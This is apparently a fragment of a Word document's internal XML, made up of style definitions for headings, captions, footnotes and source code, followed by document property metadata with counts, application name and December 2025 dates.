      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="60">
    <w:name w:val="标题 6 字符"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="6"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00A10FD9"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="70">
    <w:name w:val="标题 7 字符"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="7"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00A10FD9"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="80">
    <w:name w:val="标题 8 字符"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="8"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00A10FD9"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="90">
    <w:name w:val="标题 9 字符"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="9"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00A10FD9"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aa">
    <w:name w:val="Block Text"/>
    <w:basedOn w:val="a0"/>
    <w:next w:val="a0"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="100" w:after="100"/>
      <w:ind w:left="480" w:right="480"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ab">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="FootnoteBlockText">
    <w:name w:val="Footnote Block Text"/>
    <w:basedOn w:val="ab"/>
    <w:next w:val="ab"/>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a"/>
    <w:next w:val="Definition"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Definition">
    <w:name w:val="Definition"/>
    <w:basedOn w:val="a"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ac">
    <w:name w:val="caption"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="ad"/>
    <w:pPr>
      <w:spacing w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableCaption">
    <w:name w:val="Table Caption"/>
    <w:basedOn w:val="ac"/>
    <w:pPr>
      <w:keepNext/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ImageCaption">
    <w:name w:val="Image Caption"/>
    <w:basedOn w:val="ac"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Figure">
    <w:name w:val="Figure"/>
    <w:basedOn w:val="a"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CaptionedFigure">
    <w:name w:val="Captioned Figure"/>
    <w:basedOn w:val="Figure"/>
    <w:pPr>
      <w:keepNext/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ad">
    <w:name w:val="题注 字符"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="ac"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="VerbatimChar">
    <w:name w:val="Verbatim Char"/>
    <w:basedOn w:val="ad"/>
    <w:link w:val="SourceCode"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SectionNumber">
    <w:name w:val="Section Number"/>
    <w:basedOn w:val="ad"/>
  </w:style>
  <w:style w:type="character" w:styleId="ae">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="ad"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="ad"/>
    <w:rPr>
      <w:color w:val="156082" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="a0"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="240" w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="SourceCode">
    <w:name w:val="Source Code"/>
    <w:basedOn w:val="a"/>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4B69166-4AEF-4A8F-9D47-447DE2FFF26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1</Pages>
  <Words>649</Words>
  <Characters>3702</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>30</Lines>
  <Paragraphs>8</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>4343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bw z</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-12-05T06:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-05T06:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>